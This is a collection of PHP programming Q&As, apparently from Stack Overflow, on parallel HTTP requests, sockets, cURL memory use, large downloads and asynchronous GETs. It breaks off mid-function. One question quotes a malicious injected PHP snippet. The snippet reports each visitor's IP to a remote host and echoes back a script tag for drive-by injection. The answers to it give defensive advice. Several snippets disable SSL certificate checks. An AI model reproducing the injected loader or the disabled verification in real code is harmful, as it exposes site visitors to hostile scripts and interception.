Running several PHP processes in parallel - php

We're working on an SEO-related script in PHP, and once the crawling process finishes we need to run different modules (each one is a separate .php file) at the same time. In other words, we need to execute more than 10 .php files in parallel.
The application used to run them in sequence: when one script ended, the user's browser was forwarded to the next one. Each script establishes a connection to the database and sends different HTTP requests to the crawled web application.
I understand that this could be approached using popen? Is there any way for the main script that triggers these modules to receive information from each of them? Could anyone provide a very short snippet to show how this would work?

Try this technique for running multiple parallel jobs in PHP. In this example, we have two job files that we want to run: j1.php and j2.php. The sample jobs don't do anything fancy. The file j1.php looks like this:
$jobname = 'j1';
set_time_limit(0);
$secs = 60;
while ($secs) {
echo $jobname,'::',$secs,"\n";
flush(); @ob_flush(); ## make sure that all output is sent in real-time
$secs -= 1;
$t = time();
sleep(1); // pause
}
The reason we call flush(); @ob_flush(); is that when we echo or print, the strings are sometimes buffered by PHP and not sent until later. These two functions ensure that all data is sent immediately.
We then have a third file, control.php, which coordinates jobs j1 and j2. This script calls j1.php and j2.php asynchronously using fsockopen in JobStartAsync(), so we are able to run j1.php and j2.php in parallel. The output from j1.php and j2.php is returned to control.php using JobPollAsync().
#
# control.php
#
function JobStartAsync($server, $url, $port=80,$conn_timeout=30, $rw_timeout=86400)
{
$errno = '';
$errstr = '';
set_time_limit(0);
$fp = fsockopen($server, $port, $errno, $errstr, $conn_timeout);
if (!$fp) {
echo "$errstr ($errno)<br />\n";
return false;
}
$out = "GET $url HTTP/1.1\r\n";
$out .= "Host: $server\r\n";
$out .= "Connection: Close\r\n\r\n";
stream_set_blocking($fp, false);
stream_set_timeout($fp, $rw_timeout);
fwrite($fp, $out);
return $fp;
}
// returns false if HTTP disconnect (EOF), or a string (could be empty string) if still connected
function JobPollAsync(&$fp)
{
if ($fp === false) return false;
if (feof($fp)) {
fclose($fp);
$fp = false;
return false;
}
return fread($fp, 10000);
}
###########################################################################################
if (1) { /* SAMPLE USAGE BELOW */
$fp1 = JobStartAsync('localhost','/jobs/j1.php');
$fp2 = JobStartAsync('localhost','/jobs/j2.php');
while (true) {
sleep(1);
$r1 = JobPollAsync($fp1);
$r2 = JobPollAsync($fp2);
if ($r1 === false && $r2 === false) break;
echo "<b>r1 = </b>$r1<br>";
echo "<b>r2 = </b>$r2<hr>";
flush(); @ob_flush();
}
echo "<h3>Jobs Complete</h3>";
}
Good read: Divide-and-conquer and parallel processing in PHP (from the source)

If the various PHP files have no dependencies on each other, I think you can use a multi-curl approach, which can be implemented as shown:
// cURL needs full URLs in practice, e.g. http://localhost/file1.php
$linkArray = array('file1.php', 'file2.php','file3.php','file4.php','file5.php');
$nodes = ($linkArray);
$node_count = count($nodes);
$curl_arr = array();
$master = curl_multi_init();
$counter = 0;
for($i = 0; $i < $node_count; $i++)
{
$url =$nodes[$i];
$curl_arr[$i] = curl_init($url);
curl_setopt($curl_arr[$i], CURLOPT_RETURNTRANSFER, true);
curl_multi_add_handle($master, $curl_arr[$i]);
}
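do {
curl_multi_exec($master,$running);
if ($running > 0) {
curl_multi_select($master, 1.0); // wait for activity instead of busy-looping
}
} while($running > 0);
$results = array();
for($k=0;$k<$node_count;$k++){
$results[$k] = curl_multi_getcontent ($curl_arr[$k]); // contains the output of individual files
}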
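Since the question mentions popen: a minimal sketch of that route, assuming a Unix-like host where the PHP command-line binary is available, could use proc_open and stream_select to start every module at once and collect each one's output in the main script. The helper name run_parallel and the example commands are made up for illustration and do not come from the answers above.

```php
<?php
// Sketch only: run_parallel() is a hypothetical helper, not a built-in.
// Assumes a Unix-like system (stream_select() on process pipes is unreliable on Windows).
function run_parallel(array $commands): array
{
    $procs = [];
    $pipes = [];
    $output = [];
    foreach ($commands as $name => $cmd) {
        $p = [];
        // Only stdout (descriptor 1) is captured; stdin and stderr are inherited.
        $proc = proc_open($cmd, [1 => ['pipe', 'w']], $p);
        if (!is_resource($proc)) {
            $output[$name] = false; // this job could not be started
            continue;
        }
        $procs[$name] = $proc;
        $pipes[$name] = $p[1];
        $output[$name] = '';
    }
    // Read from whichever job has output ready until every pipe is closed.
    while ($pipes) {
        $read = array_values($pipes);
        $write = null;
        $except = null;
        if (stream_select($read, $write, $except, 1) === false) {
            break;
        }
        foreach ($read as $stream) {
            $name = array_search($stream, $pipes, true);
            $chunk = fread($stream, 8192);
            if ($chunk !== false && $chunk !== '') {
                $output[$name] .= $chunk;
            } elseif (feof($stream)) {
                fclose($stream);
                proc_close($procs[$name]);
                unset($pipes[$name], $procs[$name]);
            }
        }
    }
    return $output;
}
```

In the main script this would be called with one command per module, for example run_parallel(['seo1' => 'php /path/to/module1.php', 'seo2' => 'php /path/to/module2.php']), where the paths are placeholders. Whatever each module echoes comes back under its key.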

Related

Read to the end of an XML response when the server isn't specifying the end of file?

I'm writing a script that communicates with a server via XML. I can tell I'm making successful requests to the server's API because I can see in a log on the server it's receiving them, however I'm having a hard time receiving the response (XML). I do not own the server and unfortunately cannot modify any of the programs sending the response.
I don't think the server is specifying the end of the file, so doing a while (!feof($fp)) { ... } hangs. And unfortunately I don't think I have any way (to my knowledge) of determining the size of the response before reading it.
What I am doing and what I have attempted:
function postXMLSocket ($server, $path, $port, $xmlDocument) {
$contentLength = strlen($xmlDocument);
$result = '';
// Handling error case in else statement below
if ($fp = @fsockopen($server, $port, $errno, $errstr, 30)) {
$out = "POST / HTTP/1.0\r\n";
$out .= "Host: ".$server."\r\n";
$out .= "Content-Type: text/xml\r\n";
$out .= "Content-Length: ".$contentLength."\r\n";
$out .= "Connection: close\r\n";
$out .= "\r\n"; // all headers sent
$out .= $xmlDocument;
fwrite($fp, $out);
// ATTEMPT 5: Read until we have a valid XML doc -- hangs
// libxml_use_internal_errors(true);
// do {
// $result .= fgets($fp, 128);
// $xmlTest = simplexml_load_string($result);
// } while ($xmlTest === false);
// ATTEMPT 4: Read X # of lines -- works but I can't know how many lines response will be
// for ($i = 0; $i < 10; $i++) {
// $result .= fgets($fp, 128);
// }
// ATTEMPT 3: Read until the lines being read are empty -- hangs
// do {
// $lineRead = fgets($fp, 500);
// $result .= $lineRead;
// } while (strlen($lineRead) > 0);
// ATTEMPT 2: Read the whole file w/ fread -- only reads part of file
// $result = fread($fp, 8192);
// ATTEMPT 1: Read to the EOF -- hangs
// while (!feof($fp)) {
// $result .= fgets($fp, 128);
// }
fclose($fp);
}
else {
// Could not connect to socket
return false;
}
return $result;
}
Attempt descriptions:
1) First I just tried reading lines until reaching the end of the file. This keeps hanging and resulting in a time out and I think it's because the server isn't marking the end of the XML file it's responding with, so it's getting caught in an infinite loop.
2) Second I tried to read response as one whole file. This worked and I got something back, but it was incomplete (seems the response is quite large). While this works, I don't have any way of knowing how big the response will be before reading it, so I don't think this is an option.
3) Next I tried reading until fgets is returning an empty string. I made the assumption it would do this if it's reading lines after passing the end of the file, but this hangs as well.
4) For this attempt I just tried to read a hardcoded number of lines (10 in this case), but this has similar problems to attempt 2 above where I can't accurately know how many lines the response will have until after reading it.
5) This is where I thought I was getting clever. I know the response will be XML, and will be contained in a <Response> node. Therefore I thought I could get away with reading until the $result variable contained a valid XML string, however this seems to hang as well.
Using a higher level approach to HTTP requests will probably help you. Try this:
$stringWithSomeXml = "your payload xml here";
postXml("www.google.com", "/path/on/server", 80, $stringWithSomeXml);
function postXml($server, $path, $port, $xmlPayload)
{
$ch = curl_init();
$path = ltrim($path, "/");
if ($port == 443) {
$url = "https://{$server}/{$path}";
} else {
$url = "http://{$server}:{$port}/{$path}";
}
echo "\n$url\n";
curl_setopt(
$ch,
CURLOPT_URL,
$url
);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt(
$ch,
CURLOPT_HTTPHEADER,
[
"Content-type: application/xml",
"Content-Length: ".strlen($xmlPayload)
]
);
curl_setopt($ch, CURLOPT_POSTFIELDS, $xmlPayload);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
$result = curl_exec($ch);
echo "length: " . strlen($result) . "\n";
echo "content: " . $result . "\n";
curl_close($ch);
}
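If you have to stay on raw sockets, the end of the body has to be found some other way than feof() whenever the server keeps the connection open. A minimal sketch, assuming the server sends a Content-Length header (the question does not confirm this), reads the headers first and then exactly that many bytes. The function name read_http_response is made up for this example.

```php
<?php
// Sketch only: read_http_response() is a hypothetical helper.
// It relies on Content-Length instead of waiting for EOF.
function read_http_response($fp): ?string
{
    $length = null;
    // Read header lines until the blank line that ends the header block.
    while (($line = fgets($fp)) !== false) {
        if (rtrim($line, "\r\n") === '') {
            break;
        }
        if (stripos($line, 'Content-Length:') === 0) {
            $length = (int) trim(substr($line, strlen('Content-Length:')));
        }
    }
    if ($length === null) {
        return null; // no Content-Length: this sketch cannot tell where the body ends
    }
    $body = '';
    while (strlen($body) < $length) {
        $chunk = fread($fp, $length - strlen($body));
        if ($chunk === false || $chunk === '') {
            break; // timeout or connection closed early
        }
        $body .= $chunk;
    }
    return $body;
}
```

Calling stream_set_timeout($fp, 10) before reading keeps a silent server from blocking the script indefinitely; the 10 seconds is an arbitrary choice.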

Malicious PHP code injected into a PHP file

Last week we had a problem on our server where code was injected into PHP files. I was wondering what the cause of this could have been. The code snippet that has been injected into our files looked something like this.
#be7339#
if (empty($qjqb))
{
error_reporting(0);
@ini_set('display_errors', 0);
if (!function_exists('__url_get_contents'))
{
function __url_get_contents($remote_url, $timeout)
{
if(function_exists('curl_exec'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $remote_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
$_url_get_contents_data = curl_exec($ch);
curl_close($ch);
}
elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
{
$ctx = @stream_context_create(array('http' =>array('timeout' => $timeout,)));
$_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
} elseif (function_exists('fopen') && function_exists('stream_get_contents')) {
$handle = @fopen($remote_url, "r");
$_url_get_contents_data = @stream_get_contents($handle);
} else {
$_url_get_contents_data = __file_get_url_contents($remote_url);
}
return $_url_get_contents_data;
}
}
if (!function_exists('__file_get_url_contents'))
{
function __file_get_url_contents($remote_url)
{
if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url, $matches))
{
$protocol = strtolower($matches[1]);
$host = $matches[2];
$path = $matches[3];
} else {
// Bad remote_url-format
return FALSE;
}
if ($protocol == "http")
{
$socket = @fsockopen($host, 80, $errno, $errstr, $timeout);
} else
{
// Bad protocol
return FALSE;
}
if (!$socket)
{
// Error creating socket
return FALSE;
}
$request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
$len_written = @fwrite($socket, $request);
if ($len_written === FALSE || $len_written != strlen($request))
{
// Error sending request
return FALSE;
}
$response = "";
while (!@feof($socket) &&
($buf = @fread($socket, 4096)) !== FALSE) {
$response .= $buf;
}
if ($buf === FALSE) {
// Error reading response
return FALSE;
}
$end_of_header = strpos($response, "\r\n\r\n");
return substr($response, $end_of_header + 4);
}
}
if (empty($__var_to_echo) && empty($remote_domain))
{
$_ip = $_SERVER['REMOTE_ADDR'];
$qjqb = "http://pleasedestroythis.net/L3xmqGtN.php";
$qjqb = __url_get_contents($qjqb."?a=$_ip", 1);
if (strpos($qjqb, 'http://') === 0)
{
$__var_to_echo = '<script type="text/javascript" src="' . $qjqb . '?id=13028308"></script>';
echo $__var_to_echo;
}
}
}
I would like to ask how this could have happened, and how to prevent it in the future.
Thanks in advance.
Script (PHP) code injection usually means that someone has gotten hold of the password(s) to your hosting account. At the very minimum scan your PCs for spyware and viruses, and then change your passwords. Use SSL when connecting to your hosting account control panel, if possible. Be careful about using FTP, as it sends passwords in the clear. See if your host supports a more secure file transfer method.
The most common way this happens is through a script that allows file uploads. If the script does not validate what is uploaded, a malicious user can upload a PHP file.
If your upload folder allows PHP files to be parsed, the user can run that file from the browser. It could be some sort of file explorer that shows the user all the files on your server. If any files have permissive write permissions, the user can then easily edit them to include the extra code you are seeing.
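As an illustration of the validation step, here is a minimal sketch of an extension allowlist check. The function name and both lists are assumptions made for this example; adjust them to what your application actually needs to accept.

```php
<?php
// Sketch only: is_allowed_upload() and both lists are illustrative assumptions.
function is_allowed_upload(string $filename): bool
{
    $allowed = ['jpg', 'jpeg', 'png', 'gif', 'pdf'];
    $executable = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'pht', 'cgi', 'pl'];
    // basename() drops any directory components a client may have sent.
    $parts = explode('.', strtolower(basename($filename)));
    if (count($parts) < 2) {
        return false; // no extension at all
    }
    // The final extension must be on the allowlist.
    if (!in_array(end($parts), $allowed, true)) {
        return false;
    }
    // Reject names such as shell.php.jpg: some server configurations
    // still hand files with an inner executable extension to the interpreter.
    foreach (array_slice($parts, 1, -1) as $inner) {
        if (in_array($inner, $executable, true)) {
            return false;
        }
    }
    return true;
}
```

A name check alone is not enough. Storing uploads outside the web root, or disabling PHP execution in the upload directory, covers the case where something slips through.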
Usually it's because somebody else got access to your FTP or you allow uploading PHP files.
You should look into other files, because there could be other code that keeps adding those lines to your code (just a guess because of "#be7339#" at the beginning).
What is the Apache version on your server? This problem can come from using an outdated version.
See this page about security vulnerabilities in old Apache versions:
http://httpd.apache.org/security/vulnerabilities_20.html

How to reduce virtual memory by optimising my PHP code?

My current code (see below) uses 147MB of virtual memory!
My provider has allocated 100MB by default and the process is killed once run, causing an internal error.
The code is utilising curl multi and must be able to loop with more than 150 iterations whilst still minimizing the virtual memory. The code below is only set at 150 iterations and still causes the internal server error. At 90 iterations the issue does not occur.
How can I adjust my code to lower the resource use / virtual memory?
Thanks!
<?php
function udate($format, $utimestamp = null) {
if ($utimestamp === null)
$utimestamp = microtime(true);
$timestamp = floor($utimestamp);
$milliseconds = round(($utimestamp - $timestamp) * 1000);
return date(preg_replace('`(?<!\\\\)u`', $milliseconds, $format), $timestamp);
}
$url = 'https://www.testdomain.com/';
$curl_arr = array();
$master = curl_multi_init();
for($i=0; $i<150; $i++)
{
$curl_arr[$i] = curl_init();
curl_setopt($curl_arr[$i], CURLOPT_URL, $url);
curl_setopt($curl_arr[$i], CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl_arr[$i], CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($curl_arr[$i], CURLOPT_SSL_VERIFYPEER, FALSE);
curl_multi_add_handle($master, $curl_arr[$i]);
}
do {
curl_multi_exec($master,$running);
} while($running > 0);
for($i=0; $i<150; $i++)
{
$results = curl_multi_getcontent ($curl_arr[$i]);
$results = explode("<br>", $results);
echo $results[0];
echo "<br>";
echo $results[1];
echo "<br>";
echo udate('H:i:s:u');
echo "<br><br>";
usleep(100000);
}
?>
As per your last comment..
Download RollingCurl.php.
Hopefully this will sufficiently spam the living daylights out of your API.
<?php
$url = '________';
$fetch_count = 150;
$window_size = 5;
require("RollingCurl.php");
function request_callback($response, $info, $request) {
list($result0, $result1) = explode("<br>", $response);
echo "{$result0}<br>{$result1}<br>";
//print_r($info);
//print_r($request);
echo "<hr>";
}
$urls = array_fill(0, $fetch_count, $url);
$rc = new RollingCurl("request_callback");
$rc->window_size = $window_size;
foreach ($urls as $url) {
$request = new RollingCurlRequest($url);
$rc->add($request);
}
$rc->execute();
?>
Looking through your questions, I saw this comment:
If the intention is domain snatching, then using one of the established services is a better option. Your script implementation is hardly as important as the actual connection and latency.
I agree with that comment.
Also, you seem to have posted the "same question" approximately seven hundred times:
https://stackoverflow.com/users/558865/icer
https://stackoverflow.com/users/516277/icer
How can I adjust the server to run my PHP script quicker?
How can I re-code my php script to run as quickly as possible?
How to run cURL once, checking domain availability in a loop? Help fixing code please
Help fixing php/api/curl code please
How to reduce virtual memory by optimising my PHP code?
Overlapping HTTPS requests?
Multiple https requests.. how to?
Doesn't the fact that you have to keep asking the same question over and over tell you that you're doing it wrong?
This comment of yours:
@mario: Cheers. I'm competing against 2 other companies for specific ccTLD's. They are new to the game and they are snapping up those domains in slow time (up to 10 seconds after purge time). I'm just a little slower at the moment.
I'm fairly sure that PHP on a shared hosting account is the wrong tool to use if you are seriously trying to beat two companies at snapping up expired domain names.
The result of each of the 150 queries is being stored in PHP memory, and by your evidence that memory is insufficient. The only conclusion is that you cannot keep 150 responses in memory. You must either stream the responses to files instead of memory buffers, or reduce the number of simultaneous queries and process the list of URLs in batches.
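The batch option could look roughly like the sketch below: only one batch of responses is held in memory at a time, and each body is handed to a callback and then dropped. The helper names fetch_batch and fetch_in_batches, and the optional fourth parameter used to swap in a different fetcher, are assumptions made for this example.

```php
<?php
// Sketch only: fetch_batch() and fetch_in_batches() are hypothetical helpers.
function fetch_batch(array $urls): array
{
    $mh = curl_multi_init();
    $handles = [];
    foreach ($urls as $key => $url) {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_multi_add_handle($mh, $ch);
        $handles[$key] = $ch;
    }
    do {
        $status = curl_multi_exec($mh, $running);
        if ($running) {
            curl_multi_select($mh, 1.0); // wait for activity instead of spinning
        }
    } while ($running && $status === CURLM_OK);
    $bodies = [];
    foreach ($handles as $key => $ch) {
        $bodies[$key] = curl_multi_getcontent($ch);
        curl_multi_remove_handle($mh, $ch);
        curl_close($ch);
    }
    curl_multi_close($mh);
    return $bodies;
}

// Processes $urls in groups of $batchSize and passes every body to $onBody.
function fetch_in_batches(array $urls, int $batchSize, callable $onBody, ?callable $fetch = null): void
{
    $fetch = $fetch ?? 'fetch_batch';
    foreach (array_chunk($urls, $batchSize) as $batch) {
        foreach ($fetch($batch) as $body) {
            $onBody($body);
        }
    }
}
```

With the code from the question this would be something like fetch_in_batches(array_fill(0, 150, $url), 10, function ($body) { echo $body, "<br>"; }); where the batch size of 10 is a guess to tune against the memory limit.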
To use streams you must set CURLOPT_RETURNTRANSFER to 0 and implement a callback for CURLOPT_WRITEFUNCTION; there is an example in the PHP manual:
http://www.php.net/manual/en/function.curl-setopt.php#98491
function on_curl_write($ch, $data)
{
global $fh;
$bytes = fwrite ($fh, $data, strlen($data));
return $bytes;
}
curl_setopt ($curl_arr[$i], CURLOPT_WRITEFUNCTION, 'on_curl_write');
Getting the correct file handle in the callback is left as a problem for the reader to solve.
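One possible way to solve it, sketched under the assumption that each request gets its own output file, is to build the callback as a closure bound to that file handle, so no global is needed. The names make_file_writer and add_streaming_handle are made up for this example.

```php
<?php
// Sketch only: both helpers are hypothetical, not part of the cURL extension.
// Builds a CURLOPT_WRITEFUNCTION callback bound to one file handle.
function make_file_writer($fh): callable
{
    return function ($ch, string $data) use ($fh): int {
        $written = fwrite($fh, $data);
        // cURL aborts the transfer if the returned count differs from strlen($data).
        return $written === false ? 0 : $written;
    };
}

// Adds one streaming transfer to an existing multi handle.
function add_streaming_handle($master, string $url, string $path): array
{
    $fh = fopen($path, 'w');
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_WRITEFUNCTION, make_file_writer($fh));
    curl_multi_add_handle($master, $ch);
    return [$ch, $fh]; // the caller closes both once the transfer has finished
}
```

If nothing needs to happen to the data on its way to disk, setting CURLOPT_FILE to the file handle achieves the same result without a callback.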
<?php
echo str_repeat(' ', 1024); //to make flush work
$url = 'http://__________/';
$fetch_count = 15;
$delay = 100000; //0.1 second
//$delay = 1000000; //1 second
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
for ($i=0; $i<$fetch_count; $i++) {
$start = microtime(true);
$result = curl_exec($ch);
list($result0, $result1) = explode("<br>", $result);
echo "{$result0}<br>{$result1}<br>";
flush();
$end = microtime(true);
$sleeping = max(0, (int) round($delay - ($end - $start) * 1000000)); // both terms in microseconds
echo 'sleeping: ' . ($sleeping / 1000000) . ' seconds<hr />';
usleep($sleeping);
}
curl_close($ch);
?>

PHP - Downloading very large files with fsockopen(), fgets() and feof()

I have a simple download function in a class that might be dealing with files of many hundreds of megabytes at a time from an Amazon Web Services bucket. The whole file cannot be loaded into memory at once, so it must be streamed directly to a file pointer. This is my understanding as this is the first time I've dealt with this issue and I'm picking things up as I go along.
I've ended up with this, based on a 4 KB file buffer which simple testing showed was a good size:
$fs = fsockopen($host, 80, $errno, $errstr, 30);
if (!$fs) {
$this->writeDebugInfo("FAILED ", $errstr . '(' . $errno . ')');
} else {
$out = "GET $file HTTP/1.1\r\n";
$out .= "Host: $host\r\n";
$out .= "Connection: Close\r\n\r\n";
fwrite($fs, $out);
$fm = fopen ($temp_file_name, "w");
stream_set_timeout($fs, 30);
while(!feof($fs) && ($debug = fgets($fs)) != "\r\n" ); // ignore headers
while(!feof($fs)) {
$contents = fgets($fs, 4096);
fwrite($fm, $contents);
$info = stream_get_meta_data($fs);
if ($info['timed_out']) {
break;
}
}
fclose($fm);
fclose($fs);
if ($info['timed_out']) {
// Delete temp file if fails
unlink($temp_file_name);
$this->writeDebugInfo("FAILED - Connection timed out: ", $temp_file_name);
} else {
// Move temp file if succeeds
$media_file_name = str_replace('temp/', 'media/', $temp_file_name);
rename($temp_file_name, $media_file_name);
$this->writeDebugInfo("SUCCESS: ", $media_file_name);
}
}
In testing it's fine. However I have got into a conversation with someone who is saying that I am not understanding how fgets() and feof() work together, and he's mentioning chunked encoding as a more efficient method.
Is the code generally OK, or am I missing something vital here? What is the benefit that chunked encoding will give me?
Your solution seems fine to me, however I have a few comments.
1) Don't build the HTTP request yourself. Instead use something like cURL. This is more foolproof and will support a wider range of responses the server might reply with. Additionally, cURL can be set up to write directly to a file, saving you from doing it yourself.
2) Using fgets may be a problem if you are reading binary data. fgets reads to the end of a line, and with binary data this may corrupt your download. Instead I suggest fread($fs, 4096); which will handle both text and binary data.
3) Chunked encoding is a way for a web server to send you the response in multiple chunks. I don't think this is very useful to you; however, a better encoding that the web server might support is gzip. This would allow the web server to compress the response on the fly. If you use a library like cURL, it can tell the server it supports gzip and then automatically decompress the response for you.
I hope this helps
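One practical point about chunked encoding and the code in the question: the request line says HTTP/1.1, and an HTTP/1.1 server is allowed to answer with Transfer-Encoding: chunked. In that case the hexadecimal chunk-size lines would end up inside the saved file unless they are stripped. A minimal sketch of that decoding step follows, assuming the headers have already been consumed; the function name copy_chunked_body is made up, and trailers after the last chunk are ignored.

```php
<?php
// Sketch only: copy_chunked_body() is a hypothetical helper.
// Copies a chunked HTTP body from $in to $out and returns the number of bytes written.
function copy_chunked_body($in, $out): int
{
    $total = 0;
    while (($line = fgets($in)) !== false) {
        // Chunk header: hex size, optionally followed by ";extension".
        $sizeField = explode(';', $line, 2)[0];
        $size = (int) hexdec(trim($sizeField));
        if ($size === 0) {
            break; // a zero-sized chunk marks the end of the body
        }
        $remaining = $size;
        while ($remaining > 0) {
            $data = fread($in, min($remaining, 4096));
            if ($data === false || $data === '') {
                return $total; // stream ended before the chunk was complete
            }
            fwrite($out, $data);
            $remaining -= strlen($data);
            $total += strlen($data);
        }
        fgets($in); // consume the CRLF that follows the chunk data
    }
    return $total;
}
```

Sending the request as HTTP/1.0, or letting cURL or the http:// stream wrapper handle the transfer, avoids the need for this step altogether.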
Don't deal with sockets; simplify your code and use PHP's cURL library, like this:
$url = 'http://'.$host.'/'.$file;
// create a new cURL resource
$fh = fopen ($temp_file_name, "w");
$ch = curl_init();
// set URL and other appropriate options
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_FILE, $fh);
//curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
// grab URL and write the response body to $fh
curl_exec($ch);
// close cURL resource, and free up system resources
curl_close($ch);
fclose($fh);
And the final result in case it helps anyone else. I also wrapped the whole thing in a retry loop to decrease the risk of a completely failed download, but it does increase the use of resources:
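$download_attempt = 1; // assumed starting value; the original snippet does not show where it is initialised
$info = array('timed_out' => false); // keeps the loop condition defined if fopen() fails
do {
$fs = fopen('http://' . $host . $file, "rb");
if (!$fs) {
$this->writeDebugInfo("FAILED ", "could not open http://" . $host . $file); // fopen() does not set $errstr/$errno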
} else {
$fm = fopen ($temp_file_name, "w");
stream_set_timeout($fs, 30);
while(!feof($fs)) {
$contents = fread($fs, 4096); // Buffered download
fwrite($fm, $contents);
$info = stream_get_meta_data($fs);
if ($info['timed_out']) {
break;
}
}
fclose($fm);
fclose($fs);
if ($info['timed_out']) {
// Delete temp file if fails
unlink($temp_file_name);
$this->writeDebugInfo("FAILED on attempt " . $download_attempt . " - Connection timed out: ", $temp_file_name);
$download_attempt++;
if ($download_attempt < 5) {
$this->writeDebugInfo("RETRYING: ", $temp_file_name);
}
} else {
// Move temp file if succeeds
$media_file_name = str_replace('temp/', 'media/', $temp_file_name);
rename($temp_file_name, $media_file_name);
$this->newDownload = true;
$this->writeDebugInfo("SUCCESS: ", $media_file_name);
}
}
} while ($download_attempt < 5 && $info['timed_out']);

How do I make an asynchronous GET request in PHP?

I wish to make a simple GET request to another script on a different server. How do I do this?
In one case, I just need to request an external script without the need for any output.
make_request('http://www.externalsite.com/script1.php?variable=45'); //example usage
In the second case, I need to get the text output.
$output = make_request('http://www.externalsite.com/script2.php?variable=45');
echo $output; //string output
To be honest, I do not want to mess around with CURL as this isn't really the job of CURL. I also do not want to make use of http_get as I do not have the PECL extensions.
Would fsockopen work? If so, how do I do this without reading in the contents of the file? Is there no other way?
Thanks all
Update
I should have added that, in the first case, I do not want to wait for the script to return anything. As I understand it, file_get_contents() will wait for the page to load fully?
file_get_contents will do what you want
$output = file_get_contents('http://www.example.com/');
echo $output;
Edit: One way to fire off a GET request and return immediately.
Quoted from http://petewarden.typepad.com/searchbrowser/2008/06/how-to-post-an.html
function curl_post_async($url, $params)
{
foreach ($params as $key => &$val) {
if (is_array($val)) $val = implode(',', $val);
$post_params[] = $key.'='.urlencode($val);
}
$post_string = implode('&', $post_params);
$parts=parse_url($url);
$fp = fsockopen($parts['host'],
isset($parts['port'])?$parts['port']:80,
$errno, $errstr, 30);
$out = "POST ".$parts['path']." HTTP/1.1\r\n";
$out.= "Host: ".$parts['host']."\r\n";
$out.= "Content-Type: application/x-www-form-urlencoded\r\n";
$out.= "Content-Length: ".strlen($post_string)."\r\n";
$out.= "Connection: Close\r\n\r\n";
if (isset($post_string)) $out.= $post_string;
fwrite($fp, $out);
fclose($fp);
}
What this does is open a socket, fire off a POST request, and immediately close the socket and return.
This is how to make Marquis' answer work with both POST and GET requests:
// $type must equal 'GET' or 'POST'
function curl_request_async($url, $params, $type='POST')
{
foreach ($params as $key => &$val) {
if (is_array($val)) $val = implode(',', $val);
$post_params[] = $key.'='.urlencode($val);
}
$post_string = implode('&', $post_params);
$parts=parse_url($url);
$fp = fsockopen($parts['host'],
isset($parts['port'])?$parts['port']:80,
$errno, $errstr, 30);
// Data goes in the path for a GET request
if('GET' == $type) $parts['path'] .= '?'.$post_string;
$out = "$type ".$parts['path']." HTTP/1.1\r\n";
$out.= "Host: ".$parts['host']."\r\n";
$out.= "Content-Type: application/x-www-form-urlencoded\r\n";
$out.= "Content-Length: ".strlen($post_string)."\r\n";
$out.= "Connection: Close\r\n\r\n";
// Data goes in the request body for a POST request
if ('POST' == $type && isset($post_string)) $out.= $post_string;
fwrite($fp, $out);
fclose($fp);
}
Regarding your update about not wanting to wait for the full page to load: I think an HTTP HEAD request is what you're looking for.
get_headers should do this, provided it is told to use HEAD. By default it sends a GET request, so set the method to HEAD in the stream context first; then only the headers are returned, not the full page content.
"PHP / Curl: HEAD Request takes a long time on some sites" describes how to do a HEAD request using PHP/Curl
If you want to trigger the request, and not hold up the script at all, there are a few ways, of varying complexities..
Execute the HTTP request as a background process, php execute a background process - basically you would execute something like "wget -O /dev/null $carefully_escaped_url" - this will be platform specific, and you have to be really careful about escaping parameters to the command
Executing a PHP script in the background - basically the same as the UNIX process method, but executing a PHP script rather than a shell command
Have a "job queue", using a database (or something like beanstalkd which is likely overkill). You add a URL to the queue, and a background process or cron-job routinely checks for new jobs and performs requests on the URL
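The job queue option can be sketched with nothing more than a locked text file, assuming a cron job or other background worker on the same machine drains it. The function names and the one-URL-per-line format are assumptions made for this example; a database table or beanstalkd would take the file's place in a real setup.

```php
<?php
// Sketch only: enqueue_url() and drain_queue() are hypothetical helpers.
// The web request calls this and returns immediately.
function enqueue_url(string $queueFile, string $url): void
{
    file_put_contents($queueFile, $url . "\n", FILE_APPEND | LOCK_EX);
}

// The background worker calls this to take every pending URL off the queue.
function drain_queue(string $queueFile): array
{
    $fh = fopen($queueFile, 'c+');
    if ($fh === false) {
        return [];
    }
    flock($fh, LOCK_EX);          // block writers while the queue is emptied
    $contents = stream_get_contents($fh);
    ftruncate($fh, 0);
    flock($fh, LOCK_UN);
    fclose($fh);
    return array_values(array_filter(explode("\n", $contents), 'strlen'));
}
```

The worker would then loop over the result of drain_queue() and request each URL with file_get_contents() or cURL, so the page that called enqueue_url() never waits for the remote server.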
You don't. While PHP offers lots of ways to call a URL, it doesn't offer out-of-the-box support for any kind of asynchronous/threaded processing per request/execution cycle. Any method of sending a request for a URL (or an SQL statement, etc.) is going to wait for some kind of response. You'll need some kind of secondary system running on the local machine to achieve this (google around for "php job queue").
I would recommend a well-tested PHP library: curl-easy
<?php
$request = new cURL\Request('http://www.externalsite.com/script2.php?variable=45');
$request->getOptions()
->set(CURLOPT_TIMEOUT, 5)
->set(CURLOPT_RETURNTRANSFER, true);
// add callback when the request will be completed
$request->addListener('complete', function (cURL\Event $event) {
$response = $event->response;
$content = $response->getContent();
echo $content;
});
while ($request->socketPerform()) {
// do anything else when the request is processed
}
function make_request($url, $waitResult=true){
